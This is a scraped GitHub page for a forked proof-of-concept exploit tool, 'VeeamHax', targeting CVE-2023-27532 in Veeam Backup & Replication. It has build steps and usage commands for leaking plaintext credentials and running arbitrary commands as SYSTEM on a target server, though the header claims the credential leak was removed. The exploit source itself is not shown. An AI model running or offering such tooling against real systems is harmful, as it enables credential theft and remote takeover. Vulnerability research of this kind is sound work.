Forked Version (RCE Only)

Forked repository and removed the credential leak part. Applied fixes for compilation.

CVE-2023-27532

Proof of Concept code to exploit CVE-2023-27532 and either leak plaintext credentials or perform remote command execution.

Overview

For a detailed analysis of the vulnerability and exploitation please read the Rapid7 AttackerKB Analysis.

Building

Open in Visual Studio. You will need to either add or update the references to Veeam.Backup.Common.dll, Veeam.Backup.Interaction.MountService.dll, and Veeam.Backup.Model.dll. To make things easier, install Veeam Backup & Replication on the development machine, although this is not a hard requirement.

Usage

Leak the plaintext credentials from the remote server.

> VeeamHax.exe --target 192.168.0.100

Run an arbitrary command with local system privileges on the remote server.

> VeeamHax.exe --target 192.168.0.100 --cmd calc.exe

Credits

Previous research into this vulnerability was performed by:

Name		Name	Last commit message	Last commit date
Latest commit History 12 Commits
Properties		Properties
.gitignore		.gitignore
App.config		App.config
Program.cs		Program.cs
Readme.md		Readme.md
VeeamHax.csproj		VeeamHax.csproj
VeeamHax.sln		VeeamHax.sln
VeeamHax1.png		VeeamHax1.png
VeeamHax2.png		VeeamHax2.png
VeeamHax3.png		VeeamHax3.png
VeeamHax_TemporaryKey.pfx		VeeamHax_TemporaryKey.pfx

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Forked Version (RCE Only)

CVE-2023-27532

Overview

Building

Usage

Credits

About

Releases

Packages

Languages

Yeeb1/CVE-2023-27532-RCE-Only

Folders and files

Latest commit

History

Repository files navigation

Forked Version (RCE Only)

CVE-2023-27532

Overview

Building

Usage

Credits

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages